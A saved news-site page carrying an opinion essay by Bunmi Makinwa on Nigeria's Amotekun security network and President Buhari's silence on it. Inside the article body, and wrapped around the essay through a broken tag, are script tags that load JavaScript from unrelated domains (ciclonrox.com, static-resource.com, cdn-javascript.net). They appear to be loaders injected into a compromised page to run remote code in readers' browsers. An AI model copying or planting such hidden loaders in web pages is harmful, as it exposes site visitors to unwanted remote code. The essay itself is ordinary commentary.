</script><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a" id="td_uid_49_5e2cc0f90b970" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="" href="https://naija247news.com/category/world/">All</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_50_5e2cc0f90b9b9" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="3" href="https://naija247news.com/category/world/africa/">Africa</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_51_5e2cc0f90ba0c" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="436" href="https://naija247news.com/category/world/africa/economy-africa/">Economy</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_52_5e2cc0f90ba45" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="357" href="https://naija247news.com/category/world/africa/investing-africa/">Investing</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_53_5e2cc0f90ba7a" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="413" href="https://naija247news.com/category/world/africa/markets-africa/">Markets</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_54_5e2cc0f90baae" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="386" href="https://naija247news.com/category/world/africa/politics-africa/">Politics</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_55_5e2cc0f90bae2" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="5" href="https://naija247news.com/category/world/americas/">Americas</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_56_5e2cc0f90bb09" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="449" href="https://naija247news.com/category/world/americas/u-s/">U.S</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_57_5e2cc0f90bb3b" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="196" href="https://naija247news.com/category/world/analysis-world/">Analysis</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_58_5e2cc0f90bb63" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="4" href="https://naija247news.com/category/world/asia/">Asia</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_59_5e2cc0f90bb8a" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="6" href="https://naija247news.com/category/world/europe/">Europe</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_60_5e2cc0f90bbb1" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="250" href="https://naija247news.com/category/world/europe/brexit/">Brexit</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_61_5e2cc0f90bbe3" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="508" href="https://naija247news.com/category/world/europe/catalonia/">Catalonia</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_62_5e2cc0f90bc14" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="368" href="https://naija247news.com/category/world/europe/frexit/">Frexit</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_63_5e2cc0f90bc47" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="207" href="https://naija247news.com/category/world/global-politics/">Global Politics</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_64_5e2cc0f90bc6e" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="195" href="https://naija247news.com/category/world/markets/">Markets</a><a class="mega-menu-sub-cat-td_uid_48_5e2cc0f907b7a"  id="td_uid_65_5e2cc0f90bc94" data-td_block_id="td_uid_48_5e2cc0f907b7a" data-td_filter_value="7" href="https://naija247news.com/category/world/middleeast/">MiddleEast</a></div></div><div id=td_uid_48_5e2cc0f907b7a class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/us-imposes-new-visa-rules-for-pregnant-women-on-birth-tourism/" rel="bookmark" title="US imposes new visa rules for pregnant women on ‘birth tourism’"><img width="218" height="150" class="entry-thumb" src="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/AP_19050685820595.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/AP_19050685820595.jpg?resize=218%2C150&#038;ssl=1 218w, https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/AP_19050685820595.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="US imposes new visa rules for pregnant women on ‘birth tourism’"/></a></div>                <a href="https://naija247news.com/category/world/americas/u-s/" class="td-post-category">U.S</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/us-imposes-new-visa-rules-for-pregnant-women-on-birth-tourism/" rel="bookmark" title="US imposes new visa rules for pregnant women on ‘birth tourism’">US imposes new visa rules for pregnant women on ‘birth tourism’</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/22/trump-administration-to-issue-new-visa-restrictions-aimed-at-curbing-birth-tourism/" rel="bookmark" title="Trump administration to issue new visa restrictions aimed at curbing &#8216;birth tourism&#8217;"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/10/2019-10-18T015813Z_1268076934_RC1BCDCBA8F0_RTRMADP_2_USA-TRUMP.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/10/2019-10-18T015813Z_1268076934_RC1BCDCBA8F0_RTRMADP_2_USA-TRUMP.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2019/10/2019-10-18T015813Z_1268076934_RC1BCDCBA8F0_RTRMADP_2_USA-TRUMP.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Trump administration to issue new visa restrictions aimed at curbing &#8216;birth tourism&#8217;"/></a></div>                <a href="https://naija247news.com/category/world/americas/u-s/" class="td-post-category">U.S</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/22/trump-administration-to-issue-new-visa-restrictions-aimed-at-curbing-birth-tourism/" rel="bookmark" title="Trump administration to issue new visa restrictions aimed at curbing &#8216;birth tourism&#8217;">Trump administration to issue new visa restrictions aimed at curbing &#8216;birth&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/22/credit-suisse-says-mozambique-liable-for-622-mln-loan-at-heart-of-bribery-scandal/" rel="bookmark" title="Credit Suisse says Mozambique liable for $622 mln loan at heart of bribery scandal"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/creditsuissereuetrs.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/creditsuissereuetrs.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/creditsuissereuetrs.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Credit Suisse says Mozambique liable for $622 mln loan at heart of bribery scandal"/></a></div>                <a href="https://naija247news.com/category/world/africa/investing-africa/" class="td-post-category">Investing</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/22/credit-suisse-says-mozambique-liable-for-622-mln-loan-at-heart-of-bribery-scandal/" rel="bookmark" title="Credit Suisse says Mozambique liable for $622 mln loan at heart of bribery scandal">Credit Suisse says Mozambique liable for $622 mln loan at heart&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/22/ghana-kenya-and-nigeria-to-keep-interest-rates-on-hold-this-month/" rel="bookmark" title="Ghana, Kenya and Nigeria to keep interest rates on hold this month"><img width="218" height="150" class="entry-thumb" src="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/Cedi-Ghana.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/Cedi-Ghana.jpg?resize=218%2C150&#038;ssl=1 218w, https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/Cedi-Ghana.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Ghana, Kenya and Nigeria to keep interest rates on hold this month"/></a></div>                <a href="https://naija247news.com/category/world/africa/economy-africa/" class="td-post-category">Economy</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/22/ghana-kenya-and-nigeria-to-keep-interest-rates-on-hold-this-month/" rel="bookmark" title="Ghana, Kenya and Nigeria to keep interest rates on hold this month">Ghana, Kenya and Nigeria to keep interest rates on hold this&#8230;</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_48_5e2cc0f907b7a" data-td_block_id="td_uid_48_5e2cc0f907b7a"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_48_5e2cc0f907b7a" data-td_block_id="td_uid_48_5e2cc0f907b7a"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="https://naija247news.com/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"><div class="entry-crumbs" itemscope itemtype="http://schema.org/BreadcrumbList"><span class="td-bred-first"><a href="https://naija247news.com/">Home</a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemprop="itemListElement" itemtype="http://schema.org/ListItem">
                               <a title="View all posts in TheBackPage" class="entry-crumb" itemscope itemprop="item" itemtype="http://schema.org/Thing" href="https://naija247news.com/category/thebackpage/">
                                  <span itemprop="name">TheBackPage</span>    </a>    <meta itemprop="position" content = "1"></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemprop="itemListElement" itemtype="http://schema.org/ListItem">
                               <a title="View all posts in Africanism" class="entry-crumb" itemscope itemprop="item" itemtype="http://schema.org/Thing" href="https://naija247news.com/category/thebackpage/africanism/">
                                  <span itemprop="name">Africanism</span>    </a>    <meta itemprop="position" content = "2"></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">The Real Amotekun Is Yet Ahead, By Bunmi Makinwa</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-311820" class="post-311820 post type-post status-publish format-standard has-post-thumbnail hentry category-africanism" itemscope itemtype="https://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="https://naija247news.com/category/thebackpage/africanism/">Africanism</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">The Real Amotekun Is Yet Ahead, By Bunmi Makinwa</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name"><div class="td-author-by">By</div> <a href="https://naija247news.com/author/247news/">Naija247news Media</a><div class="td-author-line"> - </div> </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-01-25T18:29:20+00:00" >Jan 25, 2020</time></span>                    <div class="td-post-comments"><a href="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-311820">156</span></div>                </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top td-with-like">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=The+Real+Amotekun+Is+Yet+Ahead%2C+By+Bunmi+Makinwa&url=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F&via=https%3A%2F%2Ftwitter.com%2Fnaija247new"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/&amp;media=https://naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg&description=The+Real+Amotekun+Is+Yet+Ahead%2C+By+Bunmi+Makinwa" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=The+Real+Amotekun+Is+Yet+Ahead%2C+By+Bunmi+Makinwa%20-%20https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F" ><i class="td-icon-whatsapp"></i></a>
	            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/" data-text="The Real Amotekun Is Yet Ahead, By Bunmi Makinwa" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?fit=225%2C225&ssl=1" data-caption=""><img width="225" height="225" class="entry-thumb td-modal-image" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?resize=225%2C225&ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?resize=225%2C225&#038;ssl=1 225w, https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?resize=225%2C225&#038;ssl=1 450w" sizes="(-webkit-min-device-pixel-ratio: 2) 450px, (min-resolution: 192dpi) 450px, 225px" alt="" title="Bunmi"/></a></div>
        <div class="td-a-rec td-a-rec-id-content_top  "><script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
</script></div>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_inline ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3987078757"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3987078757"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3987078757"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:320px;height:50px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3987078757"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<p>&nbsp;</p>
<p><script src="//ciclonrox.com/21d4a10d5bc3d00d52.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8660x" t    If there were any doubts in anyone’s mind, Amotekun has confirmed that Nigeria’s security situation is broken and needs mending… In a country where the president is all-powerful and his voice can direct and influence thoughts and conclusions, the perpetual withdrawal and silence of Buhari leaves serious issues unresolved… Silence has become a liability, and it will spawn more Amotekuns.


The sound of “Amotekun” has drowned out all other issues in the Nigerian public space for many days, and there is a great likelihood that the Yoruba word will take on meanings and connotations beyond the original meaning of leopard. Soon enough Wikipedia will include ‘Amotekun’ as an entry in its archives. Maybe the word will also enter the Oxford English Dictionary, as was recently the case for several words of domestic Nigerian use.

Listening to and reading about the loud pronouncements that have accompanied the establishment of the Western Nigeria Security Network, also known as Amotekun, one has to be deaf not to conclude that Nigeria is “not at ease” – to borrow a phrase from the title of a famous book by Chinua Achebe.

Following its outing, there were whispers, gasps, exclamations of relief and contentment by many people who found the Amotekun security outfit a very appropriate step taken by five governors of Nigeria’s South Western States. At last, the security situation in the region might improve, and life might become normal, many people concluded.

But there were also hisses, jeers, facial contortions by many other people on how unnecessary Amotekun was. Nothing could be farther from establishing better security than Amotekun because it would be manipulated to foster violence, others contended.

Whilst the murmurs were still germinating and mounting gradually, Attorney General Abubakar Malami threw fuel into the low fires and the explosion started. He said that Amotekun is illegal and unconstitutional. Those who support Amotekun or similar policies would have none of Malami’s points. They found that his statement was not only wrong, but it confirmed the status quo. In simple terms, it showed how the Northern ruling class wanted to perpetuate its hold on the rest of the country’s security architecture and other important spheres.

Who is right and who is wrong? This is the debate that is going on. It is loud and angry.

    President Buhari has not made any pronouncement. Nor any of his proxies. Characteristically. The highest federal government official who has spoken on the issue remains the attorney general. From a communications point-of-view, his statement is the official position of the federal government. This is the interpretation of the current silence in communication.


And the leadership of the country is silent. President Buhari has not made any pronouncement. Nor any of his proxies. Characteristically. The highest federal government official who has spoken on the issue remains the attorney general. From a communications point-of-view, his statement is the official position of the federal government. This is the interpretation of the current silence in communication.

Silence has been used frequently as an instrument of governance by the current government, and it is a strong communication tool. Whether the government has used silence strategically, or merely by accident, is less important than what effects the use has created.

After a heated political campaign and delicate elections in May 2015, President Buhari emerged as winner on the platform of the All Progressives Congress (APC). The manifesto of his party, which was used as the preaching instrument across the country by APC, had promised to change the country. The new APC government was going to repair the economy, forge a secure nation, and reduce, if not eliminate, corruption.

More than 15 million voters, constituting 54 per cent of total votes cast, who favoured Buhari waited for the beginning of a new Nigeria to emerge as soon as Buhari came into office. Silence. There was no team or energetic principals to run the affairs of state. President Buhari took about six months before he broke the long silence to appoint his cabinet.

The president’s frequent travels abroad for medical treatment were usually accompanied also by silence. His health was poor, a situation that was beyond him and anyone for that matter. But the silence, not informing the country, not appointing an acting president often, or not handing over to a designated official publicly, made his silence seriously problematic.

The herdsmen phenomenon generated national furore for a long time. Silence reigned on the matter from the number one political head of the country, until it became uncomfortable to be silent.

    Operation Amotekun will give birth to many children. The ferocity of future Amotekuns will be determined by the competent handling of these babies from birth. The security of people and asset cannot be compromised.


Silence, at critical times when serious issues are at stake, seem to have become the norm. We may remember the following:

– The tense relationship between two principal security agencies, namely the Department of State Services (DSS) and the Economic and Financial Crimes Commission (EFCC), which at times became public stand-offs.
– Closer to home, the president’s wife and first lady, Aisha Buhari becoming a megaphone of how the domestic life in Aso Rock resembles an interesting soap opera of Nollywood. But Aso Rock is not meant to be a Nollywood stage. Silence is being used as the instrument of managing the crisis.
– The agitation by several groups from the South-Eastern parts of the country for the re-establishment of Biafra, which started as little noises and has become a massive din.
– The power-play at the presidency that appeared to place the vice president under siege.

Operation Amotekun will give birth to many children. The ferocity of future Amotekuns will be determined by the competent handling of these babies from birth. The security of people and asset cannot be compromised.

Those who use silence as a strategy for results state that “actions speak louder than words”. There are certainly uses for silence as a veritable instrument of management, leadership and communication. Silence is powerful when it will bring about solutions, healing, unity and contentment. Silence cannot stop disaffection that is obvious. A deep sense of insecurity and distrust permeates the country. Timely interventions and a clear statement of positions forestall the eruption of latent anger and mis-interpretation of situations.

If there were any doubts in anyone’s mind, Amotekun has confirmed that Nigeria’s security situation is broken and needs mending.
In a country where the president is all-powerful and his voice can direct and influence thoughts and conclusions, the perpetual withdrawal and silence of Buhari leaves serious issues unresolved. There is too much dust in the air, and when the dust settles, we shall have another crisis swept under a bulging carpet covering dirt. Silence has become a liability, and it will spawn more Amotekuns.

Bunmi Makinwa is the CEO of AUNIQUEI Communication for Leadership.ype="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8660x&amp;format=arrjs&amp;r=1579972946683" type="text/javascript"></script><script src="https://ciclonrox.com/ext/21d4a10d5bc3d00d52.js?sid=52596_8660_&amp;title=aa&amp;blocks[]=31af2" type="text/javascript"></script></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon-text sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-311820" class="share-twitter sd-button share-icon" href="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/?share=twitter" target="_blank" title="Click to share on Twitter"><span>Twitter</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-311820" class="share-facebook sd-button share-icon" href="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/?share=facebook" target="_blank" title="Click to share on Facebook"><span>Facebook</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-122485731-311820-5e2cc0f910007' data-src='https://widgets.wp.com/likes/#blog_id=122485731&amp;post_id=311820&amp;origin=naija247news.com&amp;obj_id=122485731-311820-5e2cc0f910007' data-name='like-post-frame-122485731-311820-5e2cc0f910007'><h3 class="sd-title">Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_bottom ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="9430977126"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="9430977126"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="9430977126"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="9430977126"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=The+Real+Amotekun+Is+Yet+Ahead%2C+By+Bunmi+Makinwa&url=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F&via=https%3A%2F%2Ftwitter.com%2Fnaija247new"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/&amp;media=https://naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg&description=The+Real+Amotekun+Is+Yet+Ahead%2C+By+Bunmi+Makinwa" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=The+Real+Amotekun+Is+Yet+Ahead%2C+By+Bunmi+Makinwa%20-%20https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F" ><i class="td-icon-whatsapp"></i></a>
